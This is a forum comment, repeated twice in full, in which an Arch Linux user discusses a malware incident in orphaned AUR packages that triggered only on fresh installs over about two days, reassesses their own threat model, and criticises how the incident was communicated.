As I understand it, the attack vector went after orphaned packages primarily. Several of the affected packages would only run the malicious code if it was a fresh install not an update only. So it would have had to be a clean install of an affected package or a newly installed dependency called to invoke this during the approximately 2 day window.
Yes, this is bad, but it’s clearly testing for weaknesses in the chain through AUR.
Yes, I know it’s contributed code by the community and a random actor can cause havoc. Yes, I know how to manually build packages and check for changes. Yes, I am guilty of using helpers. No, I wouldn’t catch everything on my own.
I do limit what I do use from the AUR, because those installs and updates require more scrutiny.
I am reassessing my own threat model as there’s a couple of packages where I’m dependent on the AUR - most notably displaylink drivers.
I do wish communication was better around the event. I found out first through being subscribed to the mailing list. An announcement on the main page would have gone a long way.
As I understand it, the attack vector went after orphaned packages primarily. Several of the affected packages would only run the malicious code if it was a fresh install not an update only. So it would have had to be a clean install of an affected package or a newly installed dependency called to invoke this during the approximately 2 day window.
Yes, this is bad, but it’s clearly testing for weaknesses in the chain through AUR.
Yes, I know it’s contributed code by the community and a random actor can cause havoc. Yes, I know how to manually build packages and check for changes. Yes, I am guilty of using helpers. No, I wouldn’t catch everything on my own.
I do limit what I do use from the AUR, because those installs and updates require more scrutiny.
I am reassessing my own threat model as there’s a couple of packages where I’m dependent on the AUR - most notably displaylink drivers.
I do wish communication was better around the event. I found out first through being subscribed to the mailing list. An announcement on the main page would have gone a long way.